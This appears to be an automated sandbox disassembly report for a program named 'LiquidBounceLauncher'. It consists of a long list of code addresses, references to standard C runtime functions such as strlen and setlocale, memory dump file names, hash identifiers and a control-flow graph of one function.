                                                                                                                                                                                      0x00428c72
                                                                                                                                                                                      0x00428950
                                                                                                                                                                                      0x00428950
                                                                                                                                                                                      0x00428953
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428953
                                                                                                                                                                                      0x004288a9
                                                                                                                                                                                      0x004288a9
                                                                                                                                                                                      0x004288ab
                                                                                                                                                                                      0x004288ab
                                                                                                                                                                                      0x004288b0
                                                                                                                                                                                      0x004288b0
                                                                                                                                                                                      0x004288b0
                                                                                                                                                                                      0x004288b0
                                                                                                                                                                                      0x004288b0
                                                                                                                                                                                      0x004288b4
                                                                                                                                                                                      0x004288b4
                                                                                                                                                                                      0x004288ba
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004288c0
                                                                                                                                                                                      0x004288c4
                                                                                                                                                                                      0x004288d8
                                                                                                                                                                                      0x004288d8
                                                                                                                                                                                      0x004288dc
                                                                                                                                                                                      0x004288dc
                                                                                                                                                                                      0x004288e2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004288d4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004288d6
                                                                                                                                                                                      0x004288d6
                                                                                                                                                                                      0x004288e4
                                                                                                                                                                                      0x004288e7
                                                                                                                                                                                      0x00428962
                                                                                                                                                                                      0x004288b0
                                                                                                                                                                                      0x004288b0
                                                                                                                                                                                      0x004288b4
                                                                                                                                                                                      0x004288b4
                                                                                                                                                                                      0x004288ba
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004288ba
                                                                                                                                                                                      0x004288ec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004288ec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004289df
                                                                                                                                                                                      0x004289df
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004289df
                                                                                                                                                                                      0x00428943
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004288ee
                                                                                                                                                                                      0x004288ee
                                                                                                                                                                                      0x004288ee
                                                                                                                                                                                      0x004288f3
                                                                                                                                                                                      0x004288f3
                                                                                                                                                                                      0x004288f3
                                                                                                                                                                                      0x004288f6
                                                                                                                                                                                      0x00428903
                                                                                                                                                                                      0x00428903
                                                                                                                                                                                      0x00428906
                                                                                                                                                                                      0x0042890b
                                                                                                                                                                                      0x0042890e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428900
                                                                                                                                                                                      0x00428900
                                                                                                                                                                                      0x00428913
                                                                                                                                                                                      0x00428916
                                                                                                                                                                                      0x00428924
                                                                                                                                                                                      0x0042892c
                                                                                                                                                                                      0x0042892f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0042886b
                                                                                                                                                                                      0x0042886b
                                                                                                                                                                                      0x004287fd
                                                                                                                                                                                      0x00428803
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428803
                                                                                                                                                                                      0x00428865
                                                                                                                                                                                      0x0042882b
                                                                                                                                                                                      0x0042882b
                                                                                                                                                                                      0x0042882f
                                                                                                                                                                                      0x00428832
                                                                                                                                                                                      0x00428837
                                                                                                                                                                                      0x0042883a
                                                                                                                                                                                      0x00428870
                                                                                                                                                                                      0x00428874
                                                                                                                                                                                      0x00428876
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428876
                                                                                                                                                                                      0x0042883c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0042883c
                                                                                                                                                                                      0x00428935
                                                                                                                                                                                      0x0042893e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0042893e
                                                                                                                                                                                      0x00428c81
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004287c9
                                                                                                                                                                                      0x004287c9
                                                                                                                                                                                      0x004287cd
                                                                                                                                                                                      0x004287cf
                                                                                                                                                                                      0x004287d3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004287d3
                                                                                                                                                                                      0x004287bb
                                                                                                                                                                                      0x004287ad
                                                                                                                                                                                      0x004287af
                                                                                                                                                                                      0x004287f0
                                                                                                                                                                                      0x004287f3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004287f3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004287af
                                                                                                                                                                                      0x004287a9
                                                                                                                                                                                      0x0042842a
                                                                                                                                                                                      0x0042842a
                                                                                                                                                                                      0x0042842d
                                                                                                                                                                                      0x00428435
                                                                                                                                                                                      0x00428446
                                                                                                                                                                                      0x0042844c
                                                                                                                                                                                      0x00428450
                                                                                                                                                                                      0x00428454
                                                                                                                                                                                      0x0042845c
                                                                                                                                                                                      0x0042845f
                                                                                                                                                                                      0x00428464
                                                                                                                                                                                      0x00428467
                                                                                                                                                                                      0x0042846c
                                                                                                                                                                                      0x00428473
                                                                                                                                                                                      0x0042847a
                                                                                                                                                                                      0x0042847d
                                                                                                                                                                                      0x00428770
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428770
                                                                                                                                                                                      0x00428483
                                                                                                                                                                                      0x00428491
                                                                                                                                                                                      0x00428971
                                                                                                                                                                                      0x00428973
                                                                                                                                                                                      0x00428984
                                                                                                                                                                                      0x00428989
                                                                                                                                                                                      0x0042898c
                                                                                                                                                                                      0x0042898e
                                                                                                                                                                                      0x00428992
                                                                                                                                                                                      0x004289ad
                                                                                                                                                                                      0x004289ad
                                                                                                                                                                                      0x004289b2
                                                                                                                                                                                      0x004289b4
                                                                                                                                                                                      0x004289b8
                                                                                                                                                                                      0x004289b8
                                                                                                                                                                                      0x004289a0
                                                                                                                                                                                      0x004289a3
                                                                                                                                                                                      0x004289a8
                                                                                                                                                                                      0x004289a8
                                                                                                                                                                                      0x004289bd
                                                                                                                                                                                      0x004289c0
                                                                                                                                                                                      0x004289c7
                                                                                                                                                                                      0x004289c9
                                                                                                                                                                                      0x00428766
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428766
                                                                                                                                                                                      0x004289d7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428497
                                                                                                                                                                                      0x0042849f
                                                                                                                                                                                      0x004284ac
                                                                                                                                                                                      0x004284af
                                                                                                                                                                                      0x004284af
                                                                                                                                                                                      0x004284b4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004284ba
                                                                                                                                                                                      0x004284c0
                                                                                                                                                                                      0x004284db
                                                                                                                                                                                      0x004284de
                                                                                                                                                                                      0x004284e6
                                                                                                                                                                                      0x004284ea
                                                                                                                                                                                      0x00428c56
                                                                                                                                                                                      0x00428c59
                                                                                                                                                                                      0x00428c5c
                                                                                                                                                                                      0x00428539
                                                                                                                                                                                      0x00428539
                                                                                                                                                                                      0x0042853f
                                                                                                                                                                                      0x00428549
                                                                                                                                                                                      0x0042854c
                                                                                                                                                                                      0x00428554
                                                                                                                                                                                      0x00428554
                                                                                                                                                                                      0x00428557
                                                                                                                                                                                      0x00428561
                                                                                                                                                                                      0x00428564
                                                                                                                                                                                      0x00428566
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428552
                                                                                                                                                                                      0x00428552
                                                                                                                                                                                      0x0042856a
                                                                                                                                                                                      0x0042856d
                                                                                                                                                                                      0x00428573
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428bbb
                                                                                                                                                                                      0x00428bbe
                                                                                                                                                                                      0x00428bc2
                                                                                                                                                                                      0x00428576
                                                                                                                                                                                      0x00428576
                                                                                                                                                                                      0x0042857c
                                                                                                                                                                                      0x00428583
                                                                                                                                                                                      0x00428586
                                                                                                                                                                                      0x0042858e
                                                                                                                                                                                      0x00428593
                                                                                                                                                                                      0x00428aaa
                                                                                                                                                                                      0x00428aad
                                                                                                                                                                                      0x00428ab0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428599
                                                                                                                                                                                      0x00428599
                                                                                                                                                                                      0x00428599
                                                                                                                                                                                      0x0042859c
                                                                                                                                                                                      0x004285a3
                                                                                                                                                                                      0x004285a5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004285b0
                                                                                                                                                                                      0x00428b2a
                                                                                                                                                                                      0x004285b6
                                                                                                                                                                                      0x004285bb
                                                                                                                                                                                      0x004285c3
                                                                                                                                                                                      0x004285c3
                                                                                                                                                                                      0x004285c9
                                                                                                                                                                                      0x004285d3
                                                                                                                                                                                      0x004285e0
                                                                                                                                                                                      0x004285e0
                                                                                                                                                                                      0x004285e0
                                                                                                                                                                                      0x004285e3
                                                                                                                                                                                      0x004285ea
                                                                                                                                                                                      0x004285ec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004285f7
                                                                                                                                                                                      0x004285ff
                                                                                                                                                                                      0x004285ff
                                                                                                                                                                                      0x00428611
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428613
                                                                                                                                                                                      0x0042861a
                                                                                                                                                                                      0x0042862c
                                                                                                                                                                                      0x00428631
                                                                                                                                                                                      0x00428638
                                                                                                                                                                                      0x0042863e
                                                                                                                                                                                      0x00428ac3
                                                                                                                                                                                      0x00428acb
                                                                                                                                                                                      0x00428ace
                                                                                                                                                                                      0x00428ad2
                                                                                                                                                                                      0x00428ad6
                                                                                                                                                                                      0x00428adb
                                                                                                                                                                                      0x00428ade
                                                                                                                                                                                      0x00428ae1
                                                                                                                                                                                      0x00428ae8
                                                                                                                                                                                      0x00428b13
                                                                                                                                                                                      0x00428aee
                                                                                                                                                                                      0x00428af3
                                                                                                                                                                                      0x00428afc
                                                                                                                                                                                      0x00428afc
                                                                                                                                                                                      0x00428ae8
                                                                                                                                                                                      0x0042864a
                                                                                                                                                                                      0x0042864e
                                                                                                                                                                                      0x00428652
                                                                                                                                                                                      0x00428656
                                                                                                                                                                                      0x00428659
                                                                                                                                                                                      0x0042865e
                                                                                                                                                                                      0x00428674
                                                                                                                                                                                      0x00428676
                                                                                                                                                                                      0x00428678
                                                                                                                                                                                      0x0042867c
                                                                                                                                                                                      0x0042868d
                                                                                                                                                                                      0x0042868d
                                                                                                                                                                                      0x0042868d
                                                                                                                                                                                      0x00428693
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428680
                                                                                                                                                                                      0x00428683
                                                                                                                                                                                      0x00428688
                                                                                                                                                                                      0x0042868b
                                                                                                                                                                                      0x004286a9
                                                                                                                                                                                      0x004286a9
                                                                                                                                                                                      0x004286ac
                                                                                                                                                                                      0x004286b3
                                                                                                                                                                                      0x004286b5
                                                                                                                                                                                      0x004286b7
                                                                                                                                                                                      0x00428b04
                                                                                                                                                                                      0x00428a5b
                                                                                                                                                                                      0x00428a5b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428a5b
                                                                                                                                                                                      0x004286ce
                                                                                                                                                                                      0x004286d1
                                                                                                                                                                                      0x004286d6
                                                                                                                                                                                      0x00428a55
                                                                                                                                                                                      0x00428b20
                                                                                                                                                                                      0x00428b20
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428a55
                                                                                                                                                                                      0x004286dc
                                                                                                                                                                                      0x004286e1
                                                                                                                                                                                      0x00428b95
                                                                                                                                                                                      0x00428b9c
                                                                                                                                                                                      0x00428ba3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428ba9
                                                                                                                                                                                      0x00428bac
                                                                                                                                                                                      0x00428bb3
                                                                                                                                                                                      0x00428b43
                                                                                                                                                                                      0x00428b43
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428b43
                                                                                                                                                                                      0x004286ec
                                                                                                                                                                                      0x004286ef
                                                                                                                                                                                      0x00428707
                                                                                                                                                                                      0x00428707
                                                                                                                                                                                      0x0042870c
                                                                                                                                                                                      0x0042870f
                                                                                                                                                                                      0x00428713
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428715
                                                                                                                                                                                      0x00428715
                                                                                                                                                                                      0x0042871c
                                                                                                                                                                                      0x0042871e
                                                                                                                                                                                      0x00428721
                                                                                                                                                                                      0x00428701
                                                                                                                                                                                      0x00428703
                                                                                                                                                                                      0x00428729
                                                                                                                                                                                      0x00428729
                                                                                                                                                                                      0x0042872c
                                                                                                                                                                                      0x0042872f
                                                                                                                                                                                      0x00428736
                                                                                                                                                                                      0x0042873d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428746
                                                                                                                                                                                      0x00428749
                                                                                                                                                                                      0x00428750
                                                                                                                                                                                      0x00428758
                                                                                                                                                                                      0x00428b36
                                                                                                                                                                                      0x00428b3d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428b3d
                                                                                                                                                                                      0x0042875e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0042875e
                                                                                                                                                                                      0x00428705
                                                                                                                                                                                      0x00428705
                                                                                                                                                                                      0x00428707
                                                                                                                                                                                      0x0042870c
                                                                                                                                                                                      0x0042870f
                                                                                                                                                                                      0x00428713
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428713
                                                                                                                                                                                      0x00428723
                                                                                                                                                                                      0x00428723
                                                                                                                                                                                      0x00428727
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004286f3
                                                                                                                                                                                      0x004286f3
                                                                                                                                                                                      0x004286fa
                                                                                                                                                                                      0x004286ff
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004286ff
                                                                                                                                                                                      0x00428707
                                                                                                                                                                                      0x0042868b
                                                                                                                                                                                      0x00428695
                                                                                                                                                                                      0x0042869c
                                                                                                                                                                                      0x0042869f
                                                                                                                                                                                      0x004286a4
                                                                                                                                                                                      0x004286a7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004285f7
                                                                                                                                                                                      0x00428a03
                                                                                                                                                                                      0x00428a06
                                                                                                                                                                                      0x00428a10
                                                                                                                                                                                      0x00428a18
                                                                                                                                                                                      0x00428a18
                                                                                                                                                                                      0x00428a1d
                                                                                                                                                                                      0x00428a1d
                                                                                                                                                                                      0x00428a20
                                                                                                                                                                                      0x00428a26
                                                                                                                                                                                      0x00428a29
                                                                                                                                                                                      0x00428a2e
                                                                                                                                                                                      0x00428a33
                                                                                                                                                                                      0x00428b4b
                                                                                                                                                                                      0x00428b4e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428b4e
                                                                                                                                                                                      0x00428a3d
                                                                                                                                                                                      0x00428a86
                                                                                                                                                                                      0x00428a89
                                                                                                                                                                                      0x00428a8c
                                                                                                                                                                                      0x00428a8c
                                                                                                                                                                                      0x00428a8f
                                                                                                                                                                                      0x00428a92
                                                                                                                                                                                      0x00428a97
                                                                                                                                                                                      0x00428a99
                                                                                                                                                                                      0x00428a9d
                                                                                                                                                                                      0x00428aa0
                                                                                                                                                                                      0x00428aa7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428aa7
                                                                                                                                                                                      0x00428a3f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428a63
                                                                                                                                                                                      0x00428a67
                                                                                                                                                                                      0x00428b56
                                                                                                                                                                                      0x00428b5b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428b61
                                                                                                                                                                                      0x00428b68
                                                                                                                                                                                      0x00428b6c
                                                                                                                                                                                      0x00428b71
                                                                                                                                                                                      0x00428b78
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428b7e
                                                                                                                                                                                      0x00428b80
                                                                                                                                                                                      0x00428b83
                                                                                                                                                                                      0x00428a75
                                                                                                                                                                                      0x00428a77
                                                                                                                                                                                      0x00428a7a
                                                                                                                                                                                      0x00428a84
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428a84
                                                                                                                                                                                      0x00428a6d
                                                                                                                                                                                      0x00428a70
                                                                                                                                                                                      0x00428a73
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428a73
                                                                                                                                                                                      0x00428599
                                                                                                                                                                                      0x0042853f
                                                                                                                                                                                      0x004284f0
                                                                                                                                                                                      0x004284f6
                                                                                                                                                                                      0x004284f9
                                                                                                                                                                                      0x00428c4e
                                                                                                                                                                                      0x00428528
                                                                                                                                                                                      0x00428528
                                                                                                                                                                                      0x00428528
                                                                                                                                                                                      0x00428528
                                                                                                                                                                                      0x0042852d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428510
                                                                                                                                                                                      0x00428514
                                                                                                                                                                                      0x00428519
                                                                                                                                                                                      0x00428b8a
                                                                                                                                                                                      0x00428b8d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428519
                                                                                                                                                                                      0x00428533
                                                                                                                                                                                      0x00428536
                                                                                                                                                                                      0x00428536
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004284f9
                                                                                                                                                                                      0x004284c2
                                                                                                                                                                                      0x004284c4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004284ce
                                                                                                                                                                                      0x004284d3
                                                                                                                                                                                      0x004284d5
                                                                                                                                                                                      0x004289ea
                                                                                                                                                                                      0x00428bcf
                                                                                                                                                                                      0x00428bd6
                                                                                                                                                                                      0x00428bd9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428bdf
                                                                                                                                                                                      0x00428be2
                                                                                                                                                                                      0x00428bf7
                                                                                                                                                                                      0x00428bf9
                                                                                                                                                                                      0x00428bfd
                                                                                                                                                                                      0x00428c0e
                                                                                                                                                                                      0x00428c0e
                                                                                                                                                                                      0x00428c13
                                                                                                                                                                                      0x00428c15
                                                                                                                                                                                      0x00428c19
                                                                                                                                                                                      0x00428c19
                                                                                                                                                                                      0x00428c01
                                                                                                                                                                                      0x00428c04
                                                                                                                                                                                      0x00428c09
                                                                                                                                                                                      0x00428c09
                                                                                                                                                                                      0x00428c1e
                                                                                                                                                                                      0x00428c21
                                                                                                                                                                                      0x00428c28
                                                                                                                                                                                      0x00428c2a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428c3b
                                                                                                                                                                                      0x00428c3e
                                                                                                                                                                                      0x00428c46
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00428c46
                                                                                                                                                                                      0x00428c2a
                                                                                                                                                                                      0x004289f0
                                                                                                                                                                                      0x004289f0
                                                                                                                                                                                      0x004289f3
                                                                                                                                                                                      0x004289f7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004289f7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004284d5

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • strlen.MSVCRT ref: 00428430
                                                                                                                                                                                      • memcpy.MSVCRT ref: 00428457
                                                                                                                                                                                        • Part of subcall function 00428DF0: setlocale.MSVCRT ref: 00428E08
                                                                                                                                                                                        • Part of subcall function 00428DF0: _strdup.MSVCRT ref: 00428E16
                                                                                                                                                                                        • Part of subcall function 00428DF0: setlocale.MSVCRT ref: 00428E2C
                                                                                                                                                                                        • Part of subcall function 00428DF0: wcstombs.MSVCRT ref: 00428E57
                                                                                                                                                                                        • Part of subcall function 00428DF0: realloc.MSVCRT ref: 00428E6B
                                                                                                                                                                                        • Part of subcall function 00428DF0: wcstombs.MSVCRT ref: 00428E84
                                                                                                                                                                                        • Part of subcall function 00428DF0: setlocale.MSVCRT ref: 00428E94
                                                                                                                                                                                        • Part of subcall function 00428DF0: free.MSVCRT ref: 00428E9C
                                                                                                                                                                                        • Part of subcall function 00427E10: malloc.MSVCRT ref: 00427E2B
                                                                                                                                                                                      • strlen.MSVCRT ref: 00428786
                                                                                                                                                                                      • strlen.MSVCRT ref: 00428976
                                                                                                                                                                                      • _strdup.MSVCRT ref: 004289C0
                                                                                                                                                                                        • Part of subcall function 00428410: strlen.MSVCRT ref: 004284E1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strlen$setlocale$_strdupwcstombs$freemallocmemcpyrealloc
                                                                                                                                                                                      • String ID: \
                                                                                                                                                                                      • API String ID: 3818432545-2967466578
                                                                                                                                                                                      • Opcode ID: 47225d02c3fe50bebb99f891d03847336ec2dee1fbbdc203451c49ecb3afc123
                                                                                                                                                                                      • Instruction ID: a2684333f7b089078b7b9070105ab5cd30549b267f24d5762fe9c982729484e1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 47225d02c3fe50bebb99f891d03847336ec2dee1fbbdc203451c49ecb3afc123
                                                                                                                                                                                      • Instruction Fuzzy Hash: D042A571F062648FDB10DF69E4803AEBBF1AF55304F98455FD845AB302EB38A846CB59
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00428DF0 Relevance: 27.3, APIs: 18, Instructions: 272COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 333 428df0-428e11 setlocale 334 428e13-428e1b _strdup 333->334 335 428e1d-428e36 setlocale 333->335 334->335 336 428e40-428eb0 wcstombs realloc wcstombs setlocale free 335->336 337 428e38-428e3e 335->337 337->336 338 428eb1-428f0f mbstowcs call 420510 mbstowcs 337->338 341 428f30-428f37 338->341 342 428f11-428f15 338->342 345 42901e-429021 341->345 346 428f3d-428f44 341->346 343 429137-42913f 342->343 344 428f1b-428f1f 342->344 343->341 350 429145-42914a 343->350 344->343 347 428f25-428f2a 344->347 345->336 348 429030-429036 345->348 349 428f64-428f68 346->349 347->341 351 42917f-42918d 347->351 355 42903c-429046 348->355 356 42919d 348->356 352 428f50-428f56 349->352 353 428f6a-428f73 349->353 350->341 354 429150-42916b setlocale free 350->354 351->341 352->353 359 428f58-428f62 352->359 360 428f81-428f85 353->360 361 428f75-428f7f 353->361 362 4290f8-429104 354->362 355->348 363 429048-42904c 355->363 357 4291a3-4291ab 356->357 358 42904e-42905d 356->358 364 4291b7-4291bf 357->364 365 4291ad-4291b1 357->365 368 429070-42907a 358->368 369 42905f-429063 358->369 359->349 366 428f9a-428f9d 359->366 360->361 367 428f87-428f8a 360->367 361->360 361->361 363->348 363->358 364->358 373 4291c5-4291cd 364->373 365->358 365->364 366->348 375 428fa3-428fab 366->375 367->366 374 428f8c-428f98 367->374 368->368 372 42907c-429080 368->372 370 429069 369->370 371 42916d-429171 369->371 370->368 378 429177-42917a 371->378 379 42908f 371->379 372->368 376 429082-429089 372->376 373->358 377 4291d3-4291d7 373->377 374->349 374->366 380 429192-429195 375->380 381 428fb1-428fb5 375->381 376->371 376->379 377->358 382 4291dd-4291df 377->382 383 429091 378->383 379->383 380->356 381->380 384 428fbb-429019 wcstombs realloc wcstombs 381->384 382->358 386 429093-429096 383->386 385 4290e0-4290f3 setlocale free 384->385 385->362 387 429098-4290a3 386->387 388 4290b9-4290da wcstombs 386->388 389 429107-42910e 387->389 390 4290a5-4290ac 387->390 388->385 391 4290dc 388->391 392 429120-42912a 389->392 393 429110-429114 389->393 394 429105 390->394 395 4290ae-4290b7 390->395 391->385 392->392 397 42912c-429130 392->397 393->386 396 42911a 393->396 394->389 395->387 395->388 396->392 397->392 398 429132 397->398 398->386
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: setlocalewcstombs$free$mbstowcsrealloc$_strdup
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2891164732-0
                                                                                                                                                                                      • Opcode ID: 3b99a0241d453c06213eb3c4ccaba09dc5c63185da832c85e42818bd5600e0e2
                                                                                                                                                                                      • Instruction ID: 4012a5ff68493cfa53abf9fb6a19ef0d71beb57a30eff583fe7a14ffd7b009d7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b99a0241d453c06213eb3c4ccaba09dc5c63185da832c85e42818bd5600e0e2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 74B16870A042368ACB24AF69E0056BBF7F1EF54744FC5842FE88897315E7799C85C78A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0041F990 Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 257stringCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
